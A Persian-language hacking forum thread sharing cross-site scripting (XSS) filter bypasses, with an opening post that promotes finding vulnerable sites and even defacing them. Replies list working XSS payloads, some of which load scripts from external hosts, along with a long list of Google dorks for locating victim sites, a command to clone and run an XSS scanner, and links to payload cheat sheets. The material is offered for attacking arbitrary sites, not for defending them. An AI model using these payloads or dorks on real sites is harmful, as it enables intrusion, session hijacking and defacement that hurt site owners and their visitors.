دانلود آهنگ جدیدclose
انواع بایپس های باگ XSS
زمان جاری : چهارشنبه 30 مرداد 1398 - 12:05 بعد از ظهر
نام کاربری : پسورد : یا عضویت | رمز عبور را فراموش کردم





دانلود آهنگ جدیدclose

ارسال پاسخ
تعداد بازدید 826
نویسنده پیام
eblisshar آفلاین


ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
انواع بایپس های باگ XSS
درود . در این تایپک انواع بای پس های باگ خطرناک xss رو میزاریم
این باگ در 80% سایت ها وجود داره و فقط باید بایپس بشه
xss انواع مختلقی داره و بهترین روش اینجکت کد های جاوا اسکریپت با متود get هست که در قسمت سرچ و یا هر قسمتی که با متود get ارسال بشه میشه استفاده کرد
و البته فرقی هم نداره و میشه با متود post تست کرد مثل فروم ها و فیلدهای ثبت نام و غیره . برای پیدا کردن سایت های که این باگ رو دارن دورک های زیادی نوشته شده که داخل همین انجمن میتونید پیدا کنید.
باگ xss قدرت بسیار بالای داره و یکی از خظرناک ترین و رایج ترین باگ ها هست شما میتونید کار های بسیار زیادی با استفاده از این باگ کنید و حتی سایت رو دیفیس کنید
در اینجا سعی میکنیم تمام اسکریپهای بایپس این باگ رو قرار بدیم
به علت قدرت بالای این باگ و اینکه گزاشتن مستقیم کد ها در انجمن باعث اجرای کد میشه اسکریپ ها در فایل تکست گزاشته میشه

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:16
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
[RB:Blog_Keywords_Tags] اشرارتیم
تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran & virus32 & amirshar & demon & e-deh & mrfucker &
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 2 RE انواع بایپس های باگ XSS
دانلود :

xsscheatsheet

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 7 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 3 RE انواع بایپس های باگ XSS
دانلود : xss code

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 7 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / mrrobot / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 4 RE انواع بایپس های باگ XSS
دانلود :
xss script

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:22
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 5 RE انواع بایپس های باگ XSS
دانلود :

XSS.script

امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:23
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 6 RE انواع بایپس های باگ XSS
و این هم کامل ترین و بزرگترین لیست از بایپس های این باگ که شخصا جمع اوری کردم و نوشتم



امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 03:25
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 7 RE انواع بایپس های باگ XSS


کد:

Full URI uriInHTMLData() uriInHTMLComment() uriInSingleQuotedAttr() uriInDoubleQuotedAttr() uriInUnQuotedAttr()
URI Path uriPathInHTMLData() uriPathInHTMLComment() uriPathInSingleQuotedAttr() uriPathInDoubleQuotedAttr() uriPathInUnQuotedAttr()
URI Query uriQueryInHTMLData() uriQueryInHTMLComment() uriQueryInSingleQuotedAttr() uriQueryInDoubleQuotedAttr() uriQueryInUnQuotedAttr()
URI Component uriComponentInHTMLData() uriComponentInHTMLComment() uriComponentInSingleQuotedAttr() uriComponentInDoubleQuotedAttr() uriComponentInUnQuotedAttr()
URI Fragment uriFragmentInHTMLData() uriFragmentInHTMLComment() uriFragmentInSingleQuotedAttr() uriFragmentInDoubleQuotedAttr() uriFragmentInUnQuotedAttr()


امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 05:01
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker /
eblisshar آفلاین



ارسال‌ها : 251
عضویت: 12 /12 /1396
شناسه یاهو: eblisshar@yahoo.com
تشکرها : 321
تشکر شده : 939
پاسخ : 8 RE انواع بایپس های باگ XSS
یک ابزار عالی پایتون برای تست نفوذ سایت با باگ xss

git clone https://github.com/DanMcInerney/xsscrapy.git

cd xsscrapy

./xsscrapy.py -u http://example.com


امضای کاربر : قدرت در دست ماست و دست بالای دست بسیار است ..
سیاهی لشکر نیاید به کار / یک مرد جنگی به از صد هزار

https://t.me/ebli3shar
eblisshar.ir
https://twitter.com/shayanakbari8
https://www.linkedin.com/in/shayan-akbari-b9108b171

چو ایران نباشد تن من مباد
بدین بوم و بر زنده یک تن مباد
اگر سر به سر تن به کشتن دهیم
از آن به که کشور به دشمن دهیم
سه شنبه 24 مهر 1397 - 05:04
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از eblisshar به خاطر این مطلب مفید تشکر کرده اند: blackwolf_iran / virus32 / amirshar / demon / e-deh / mrfucker /
blackwolf_iran آفلاین



ارسال‌ها : 49
عضویت: 19 /7 /1397
تشکرها : 230
تشکر شده : 150
پاسخ : 9 RE انواع بایپس های باگ XSS
بسیار عالی و کاربردی

این هم یک لیست خوب از پیلود های این باگ



سه شنبه 24 مهر 1397 - 05:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker /
blackwolf_iran آفلاین



ارسال‌ها : 49
عضویت: 19 /7 /1397
تشکرها : 230
تشکر شده : 150
پاسخ : 10 RE انواع بایپس های باگ XSS
بایپس های دیگر

کد:

<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confiru006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javascript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((prou006dpt))()//
<sCript x>;(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src //onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>


سه شنبه 24 مهر 1397 - 05:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از blackwolf_iran به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker /
darkshadow آفلاین



ارسال‌ها : 133
عضویت: 8 /6 /1397
تشکرها : 225
تشکر شده : 293
پاسخ : 11 RE دورک xss
و این هم دروکهای خوب xss برای پیدا کردن سایت

کد:

inurl:".php?cmd="
inurl:".php?z="
inurl:".php?q="
inurl:".php?search="
inurl:".php?query="
inurl:".php?searchstring="
inurl:".php?keyword="
inurl:".php?file="
inurl:".php?years="
inurl:".php?txt="
inurl:".php?tag="
inurl:".php?max="
inurl:".php?from="
inurl:".php?author="
inurl:".php?pass="
inurl:".php?feedback="
inurl:".php?mail="
inurl:".php?cat="
inurl:".php?vote="
inurl:search.php?q=
inurl:com_feedpostold/feedpost.php?url=
inurl:scrapbook.php?id=
inurl:headersearch.php?sid=
inurl:/poll/default.asp?catid=
inurl:/search_results.php?search=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/products/classified/headersearch.php?sid=
inurl:/search_results.php?search=Search&k=
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=
inurl:pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/notice.php?msg= /notice.php?msg=
inurl:/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
inurl:/index.php?option=com_easygb&Itemid=
inurl:/2wayvideochat/index.php?r=
inurl:/view.php?PID= /view.php?PID=
inurl:/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
inurl:/showproperty.php?id= /showproperty.php?id=
inurl:/vehicle/buy_do_search/?order_direction=
inurl:/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
inurl:/winners.php?year=2008&type= /winners.php?
inurl:/schoolmv2/html/studentmain.php?*******=
inurl:/site_search.php?sfunction= /site_search.php?sfunction=
inurl:/search.php?search_keywords= /search.php?search_keywords=
inurl:/hexjector.php?site= /hexjector.php?site=
inurl:/news.php?id= /news.php?id=
inurl:/index.php?view=help&faq=1&ref=
inurl:"contentPage.php?id="
inurl:"displayResource.php?id="
inurl:/index.php?
inurl:/info.asp?
inurl:/preaspjobboard//Employee/emp_login.asp?msg1=

inurl:/pages/match_report.php?mid= pages/match_report.php?mid=


سه شنبه 24 مهر 1397 - 08:11
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 6 کاربر از darkshadow به خاطر این مطلب مفید تشکر کرده اند: eblisshar / virus32 / amirshar / demon / e-deh / mrfucker /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 159
تشکر شده : 102
پاسخ : 12 RE انواع بایپس های باگ XSS
سایت کاربردی جهت تست نفوذ باگ xss و دانلود ابزارها و ...


یکشنبه 06 آبان 1397 - 05:00
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 4 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: amirshar / demon / e-deh / mrfucker /
virus32 آفلاین



ارسال‌ها : 44
عضویت: 26 /6 /1397
تشکرها : 159
تشکر شده : 102
پاسخ : 13 RE انواع بایپس های باگ XSS
یک لیست از متود های جدید و حرفه ای برای بایپس باگ xss

دانلود :



یکشنبه 06 آبان 1397 - 05:37
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 5 کاربر از virus32 به خاطر این مطلب مفید تشکر کرده اند: eblisshar / amirshar / demon / e-deh / mrfucker /
demon آفلاین



ارسال‌ها : 49
عضویت: 17 /2 /1397
تشکرها : 155
تشکر شده : 159
پاسخ : 14 RE انواع بایپس های باگ XSS
مقاله مفید و یک ابزار برای اموزش XSS (Cross Site Scripting)


پنجشنبه 01 آذر 1397 - 20:10
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
 تشکر شده: 2 کاربر از demon به خاطر این مطلب مفید تشکر کرده اند: e-deh / mrfucker /
ارسال پاسخ



برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


پرش به انجمن :


تماس با ما | انواع بایپس های باگ XSS | بازگشت به بالا | پیوند سایتی RSS
تاپیک های مرتبط
موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
[Post_Title] [Post_Date] [Post_Answer] [Post_Last_User] [Post_Hit]